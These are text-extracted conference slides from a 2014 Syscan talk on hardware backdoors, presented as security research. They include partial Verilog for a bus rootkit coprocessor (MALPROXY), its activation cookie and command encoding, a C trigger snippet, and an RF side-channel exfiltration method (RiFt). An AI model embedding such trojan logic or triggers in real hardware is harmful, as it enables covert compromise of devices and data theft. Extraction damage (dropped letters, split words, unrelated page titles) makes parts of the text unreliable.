Vision and reflection on Mining Software Repositories research in 2024
 
Davis plaque method.pptx recombinant DNA technology
Davis plaque method.pptx recombinant DNA technologyDavis plaque method.pptx recombinant DNA technology
Davis plaque method.pptx recombinant DNA technology
 
Citronella presentation SlideShare mani upadhyay
Citronella presentation SlideShare mani upadhyayCitronella presentation SlideShare mani upadhyay
Citronella presentation SlideShare mani upadhyay
 
Let’s Say Someone Did Drop the Bomb. Then What?
Let’s Say Someone Did Drop the Bomb. Then What?Let’s Say Someone Did Drop the Bomb. Then What?
Let’s Say Someone Did Drop the Bomb. Then What?
 

Deep submicron-backdoors-ortega-syscan-2014-slides

  • 2. ltration Deep-Submicron Backdoor Syscan Singapore 2014 Alfredo Ortega Groundworks Technologies Deep-Submicron Backdoor
  • 4. ltration Agenda Introduction History Non-gov examples Agenda Deep-Submicron VLSI: Technology smaller than 350nm Hardware Backdoors History Non-Gov examples Unintentional backdoors Why create a CPU backdoor Malproxy BUS backdoor (Demo) RFI Ex
  • 5. ltration backdoor (Demo) Questions Groundworks Technologies Deep-Submicron Backdoor
  • 7. ltration Agenda Introduction History Non-gov examples Introduction Hardware": overused Not Hardware: Regular user-mode backdoors - Re ections on Trusting Trust" Weakening of protocols/cryptography (See RSA Dual EC DRBG saga) Very practical Particularly dangerous Easy to catch Software User−mode Kernel−mode Hypervisor Firmware Microcode Physics Regular Rootkits Hardware Groundworks Technologies Deep-Submicron Backdoor
  • 9. ltration Agenda Introduction History Non-gov examples Hardware" backdoors? Still in software/
  • 10. rmware Specially dangerous if massive (adversary can use them) More expensive to detect (No AVs) Software User−mode Kernel−mode Hypervisor Firmware Microcode Physics Regular Rootkits Bios Rootkits SMM Rootkits AMT Rootkits Hardware Our talk Groundworks Technologies Deep-Submicron Backdoor
  • 12. ltration Agenda Introduction History Non-gov examples History The Great Seal Bug Also called The Thing" one of the
  • 13. rst covert listening devices (Found in 1945) Designed by Leon Theremin Sound-modulated resonant cavity: No external power. Groundworks Technologies Deep-Submicron Backdoor
  • 15. ltration Agenda Introduction History Non-gov examples Clipper chip Clipper chip Developed and promoted by the U.S. NSA Announced in 1993 Skipjack algorithm - Key escrow mechanism Cryptographer Matt Blaze published a serious vulnerability. Entirely defunct by 1996 Groundworks Technologies Deep-Submicron Backdoor
  • 17. ltration Agenda Introduction History Non-gov examples NSA Ant division Catalog NSA ANT Insert catalog Catalog of hardware backdoors Developed from 2005 to 2010 Leaked by Edward Snowden Groundworks Technologies Deep-Submicron Backdoor
  • 19. ltration Agenda Introduction History Non-gov examples Non-gov examples (Legit backdoors) Intel Anti-theft tech Network equipment lawful interception Research and Academia: IEEE Hardware-Oriented Security and Trust (HOST) NYU-Poly Embedded-System Challenge Too many to cite. Very advanced. Stealthy Dopant-Level Hardware Trojans Becker Et. Al. Groundworks Technologies Deep-Submicron Backdoor
  • 21. ltration Agenda Introduction History Non-gov examples Unintentional backdoors World-accesible re ashing mechanisms (BIOS,micro-sd, pendrives, etc.) Most
  • 22. rmware-backdoors Silicon-PROASIC3 backdoor (Skorobogatov Et. Al.) JTAG-interfaces Convenience/Security tradeo Groundworks Technologies Deep-Submicron Backdoor
  • 24. ltration Agenda Introduction History Non-gov examples Rationale No real backdoor on silicon to analyze, all theoretical examples. Let's make a real one. Our approach: Real silicon ASIC design Generic and simple payload trivial to locate. No eort on stealth. Ready for massive deployment Two basic attacks: 1 Bus-intrusion (MALPROXY) 2 data-ex
  • 25. ltration (RiFt) R i Ft MAL PROXY Groundworks Technologies Deep-Submicron Backdoor
  • 27. ltration Introduction High-level design Logic ASIC Usage MALPROXY 3 4 7 1 2 13 12 11 10 9 15 Malicious Bus Proxy RAM BUS CPU 5 6 14 MALPROXY Bus backdoor Small malicious state-machine Peek/Poke functionality AMBA-compatible CPU/Software independent Real system (ARM Cortex-M0 DesignStart) FPGA and silicon-ready Easy to detect Groundworks Technologies Deep-Submicron Backdoor
  • 29. ltration Introduction High-level design Logic ASIC Usage MALPROXY High-level Design Constantly monitoring the AMBA bus. If command correctly parsed, take control of the bus and modify memory. Only two commands needed for execution control: Peek mem32 Poke mem32 If software/arch is known, only Poke command is enough. Search activation cookie Read command Read address Read data Execute command Groundworks Technologies Deep-Submicron Backdoor
  • 31. ltration Introduction High-level design Logic ASIC Usage MALPROXY: Verilog 1 // ------------------------------------------------- 2 // Trivial rootkit coprocessor unit 3 // ------------------------------------------------- 4 reg [5:0] RTKState ; 5 reg [8:0] RTKCmd ; 6 7 reg [3:0] RTKCount ; 8 `define RTK_FIND_START 5'h0 9 `define RTK_FIND_CMD 5'h1 10 `define RTK_FIND_DATA 5'h2 11 `define RTK_FIND_ADDR 5'h3 12 `define RTK_EXEC 5'h4 13 `define RTK_EXEC2 5'h5 14 `define RTK_END 5'h6 15 `define RTK_CMD_WRITE W 16 `define RTK_CMD_READ R 17 18 // 56 - bit initial cookie 19 // I.E. memcpy x78 x56 x34 x12R xaa x55 xaa ; 20 `define RTK_COOKIE_1 32' h12345678 21 `define RTK_COOKIE_2 24' h434241 22 `define RTK_COOKIE_3 24' h2D2D2D // --- 1 always @( posedge HCLK or posedge HRESETn ) 2 begin 3 if (! HRESETn ) // Reset 4 begin 5 RTKState = `RTK_FIND_START ; 6 RTKDeviated =0; 7 end 8 else begin 9 case ( RTKState ) 10 `RTK_FIND_START : // Find first part of cookie 11 if ( HWDATA == `RTK_COOKIE_1 ) 12 begin 13 RTKState = `RTK_FIND_CMD ; 14 end 15 `RTK_FIND_CMD : // Load second part of cookie and 16 begin // single - byte command 17 if ( HWDATA [31:8] == `RTK_COOKIE_2 ) 18 begin 19 RTKCmd = HWDATA [7:0]; 20 RTKState = `RTK_FIND_DATA ; 21 RTKCount =0; 22 end 23 else RTKState = `RTK_FIND_START ; 24 end Groundworks Technologies Deep-Submicron Backdoor
  • 33. ltration Introduction High-level design Logic ASIC Usage MALPROXY: Logic Malproxy 180nm, 100 Mhz: 476 Cells 1.032 mW 0.019 mm2 Total (with Cortex M0): 9526 Cells 14.7 mW 0.38 mm2 Logic diagram (incomplete) Groundworks Technologies Deep-Submicron Backdoor
  • 35. ltration Introduction High-level design Logic ASIC Usage MALPROXY: ASIC Implementation: ARM AMBA-bus compatible 100% Verilog FPGA+ASIC compatible Two process: OSU TSMC 180nm6-layer Nangate 45nm10-layer https://github.com/Groundworkstech/ Submicron (ARM core requires separate license) Placed and Routed, ARM + MalProxy, 180nm 6 metal layers Groundworks Technologies Deep-Submicron Backdoor
  • 37. ltration Introduction High-level design Logic ASIC Usage MALPROXY Demo 1: 45 nm 10-Layer structure Groundworks Technologies Deep-Submicron Backdoor
  • 39. ltration Introduction High-level design Logic ASIC Usage MALPROXY 45-nm 10-layer SOC Encounter Digital ow (Cadence) GDSII output Visible code style dierences Groundworks Technologies Deep-Submicron Backdoor
  • 41. ltration Introduction High-level design Logic ASIC Usage MALPROXY Command encoding: `define RTK_COOKIE_1 32'h12345678 `define RTK_COOKIE_2 24'h434241 `define RTK_COOKIE_3 24'h2D2D2D `define RTK_CMD_WRITE W `define RTK_CMD_READ R ------32 bits ------- - [RTK_COOKIE_1] - [RTK_COOKIE_2 + Command] - [RTK_COOKIE_3 + DATA]*4 - [RTK_COOKIE_3 + ADDR]*4 - [RTK_COOKIE_3 + EXEC] : Executes Command EXEC disconnects the CPU from the BUS and CLK for 2 clocks total. Groundworks Technologies Deep-Submicron Backdoor
  • 43. ltration Introduction High-level design Logic ASIC Usage MALPROXY:Activation Example activation code (*): 1 char buf [40]; 2 char * str= x78 x56 x34 x12WABCA ---A---A---A---x00 ---x00 ---x0a ---x65 ---; 3 while ( TRUE ) { 4 puts ( Main thread : hello world ); 5 memcpy (buf ,str ,40); -- Backdoor activates here 6 chSchDoRescheduleBehind (); 7 } (*) Activation can be triggered by any other means, e.g. network transfer, DMA, etc. Groundworks Technologies Deep-Submicron Backdoor
  • 45. ltration Introduction High-level design Logic ASIC Usage MALPROXY Demo 2: Backdoor activation Groundworks Technologies Deep-Submicron Backdoor
  • 47. ltration Introduction Simulation Measurements End RiFt: Data ex
  • 48. ltration We are not limited by standard communication (TCP/IP, etc) Many side-channels are available. We chose forced RFI using PCB traces Even LED traces can be used Target: Altera DE1 FPGA dev-board Reception with RTL-SDR, up to 5 meters with standard receiver antenna DE1 PCB Groundworks Technologies Deep-Submicron Backdoor
  • 50. ltration Introduction Simulation Measurements End RiFt: Harmonics How it works? CPUs and FPGAs usually can't emit RF directly. They can switch a pin on/o very fast (100 Mhz) This produces a square wave with in
  • 51. nite sinusoidal harmonics We can use any of those harmonic frequencies For now, just simple modulation (AM, on/o) Groundworks Technologies Deep-Submicron Backdoor
  • 53. ltration Introduction Simulation Measurements End RiFt: Harmonics Groundworks Technologies Deep-Submicron Backdoor
  • 55. ltration Introduction Simulation Measurements End RiFt: Simulation Numerical Electromagnetic Codes (xnec2c): Gain vs Freq / 3d Radiation pattern Groundworks Technologies Deep-Submicron Backdoor
  • 57. ltration Introduction Simulation Measurements End RiFt: Simulation Numerical Electromagnetic Codes (xnec2c), data
  • 58. le: CM NEC Input File CM Monopole radius 0.001m, lenght 17m above perfect ground CM Monopole pcb trace 0.0001m, lenght 17m above perfect ground CM Excitation at base by a 1V source CM GW 9 , 8, 0.00000E+00, 0.00000E+00, 0.00000E+00, 0.00000E+00, 0.00800E+00, 0.00000E+00, 1.00000E-03 CM Antenna geometry CE GW 1 , 8, 0.00000E+00, 0.00000E+00, 0.00100E+00, 0.10000E+00, 0.00000E+00, 0.00100E+00, 1.00000E-03 GW 2 , 8, 0.00000E+00, 0.00100E+00, 0.00100E+00, 0.10000E+00, 0.01000E+00, 0.00100E+00, 1.00000E-03 GW 3 , 8, 0.00000E+00, 0.00200E+00, 0.00100E+00, 0.10000E+00, 0.02000E+00, 0.00100E+00, 1.00000E-03 GW 4 , 8, 0.00000E+00, 0.00300E+00, 0.00100E+00, 0.10000E+00, 0.03000E+00, 0.00100E+00, 1.00000E-03 GW 5 , 8, 0.00000E+00, 0.00400E+00, 0.00100E+00, 0.10000E+00, 0.04000E+00, 0.00100E+00, 1.00000E-03 GW 6 , 8, 0.00000E+00, 0.00500E+00, 0.00100E+00, 0.10000E+00, 0.05000E+00, 0.00100E+00, 1.00000E-03 GW 7 , 8, 0.00000E+00, 0.00600E+00, 0.00100E+00, 0.10000E+00, 0.06000E+00, 0.00100E+00, 1.00000E-03 GW 8 , 8, 0.00000E+00, 0.00700E+00, 0.00100E+00, 0.10000E+00, 0.07000E+00, 0.00100E+00, 1.00000E-03 GE FR 0, 1000, 0,0, 100, 1 EX 0 1 1 10 1 RP 0, 19, 36, 1000, 0, 0, 10, 10 EN 0 , 0 , 0 0 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 Groundworks Technologies Deep-Submicron Backdoor
  • 60. ltration Introduction Simulation Measurements End RiFt: Demo Demo 3: Antenna simulation Groundworks Technologies Deep-Submicron Backdoor
  • 62. ltration Introduction Simulation Measurements End RiFt: Measurements Measurements: Setup Groundworks Technologies Deep-Submicron Backdoor
  • 64. ltration Introduction Simulation Measurements End RiFt: Measurements Measurements results 40 30 20 10 0 10 20 30 40 700 Mhz RiFt power measurement 0 10 20 30 40 40 30 20 10 0 10 20 30 40 dBSM Azimuth - using 1:($3-$2) Groundworks Technologies Deep-Submicron Backdoor
  • 66. ltration Introduction Simulation Measurements End RiFt: Directionality DE1 board LED 1-8 PCB traces at 700 Mhz, order is 1,3,2,4,7,8: Parasitic antenna array showing Yagi-like directionality Groundworks Technologies Deep-Submicron Backdoor
  • 68. ltration Introduction Simulation Measurements End RiFt Demo 4: RiFt in action! Groundworks Technologies Deep-Submicron Backdoor
  • 70. ltration Introduction Simulation Measurements End The end Thanks! Any question? Deep-Submicron Backdoor project was created by researchers Fernando Russ and Alfredo Ortega (Twitter: @ortegaalfredo ) from Groundworks Technologies Buenos Aires, Argentina Groundworks Technologies Deep-Submicron Backdoor